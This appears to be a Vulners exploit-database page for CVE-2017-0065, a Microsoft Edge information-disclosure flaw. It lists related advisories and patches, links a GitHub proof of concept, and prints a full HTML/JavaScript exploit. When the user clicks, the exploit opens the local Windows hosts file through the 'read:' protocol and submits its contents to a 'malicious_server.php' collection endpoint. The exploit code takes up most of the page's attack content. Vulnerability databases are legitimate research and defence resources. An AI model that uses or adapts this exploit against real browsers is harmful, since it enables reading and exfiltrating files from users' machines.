| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| The vulnerability in Microsoft Edge’s browser allows a hacker to access confidential information from the process memory, cause a service failure, or have other adverse effects on the system. | 31 Mar 201700:00 | – | bdu_fstec | |
| Microsoft Edge Information Disclosure Vulnerability (CNVD-2017-03537) | 16 Mar 201700:00 | – | cnvd | |
| Microsoft Browser Information Disclosure (MS17-007: CVE-2017-0065) | 14 Mar 201700:00 | – | checkpoint_advisories | |
| CVE-2017-0065 | 17 Mar 201700:00 | – | cve | |
| CVE-2017-0065 | 17 Mar 201700:00 | – | cvelist | |
| March 14, 2017—KB4012606 (OS Build 10240.17319) | 14 Mar 201707:00 | – | mskb | |
| MS17-007: Cumulative security update for Microsoft Edge: March 14, 2017 | 14 Mar 201700:00 | – | mskb | |
| March 14, 2017—KB4013198 (OS Build 10586.839) | 14 Mar 201707:00 | – | mskb | |
| March 14, 2017—KB4013429 (OS Build 14393.953) | 14 Mar 201707:00 | – | mskb | |
| KLA10967 Multiple vulnerabilities in Microsoft Browser | 14 Mar 201700:00 | – | kaspersky |
具体 PoC 可以参考:https://github.com/Dankirk/cve-2017-0065
<!doctype html>
<html>
<head><meta charset="UTF-8"></head>
<body>
<form id="xss_form" method="post" action="http://127.0.0.1/malicious_server.php">
<input id="xss" type="hidden" name="xss" value="">
</form>
Click anywhere to submit your hosts file
<script>
document.onclick = function(event) {
event.preventDefault();
// append a random value to prevent caching
var url = "read:,C:\\windows\\system32\\drivers\\etc\\hosts,"+Math.floor(Math.random() * 1000);
var w = window.open(url);
if (w) {
// Copy window contents, close and submit
// This is allowed because we are the same origin, since we are using subsequent read:, requests
document.getElementById("xss").value = w.document.body.innerHTML;
w.close();
document.getElementById("xss_form").submit();
}
else
document.body.innerHTML = "Popups are blocked :<";
}
</script>
</body>
</html>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation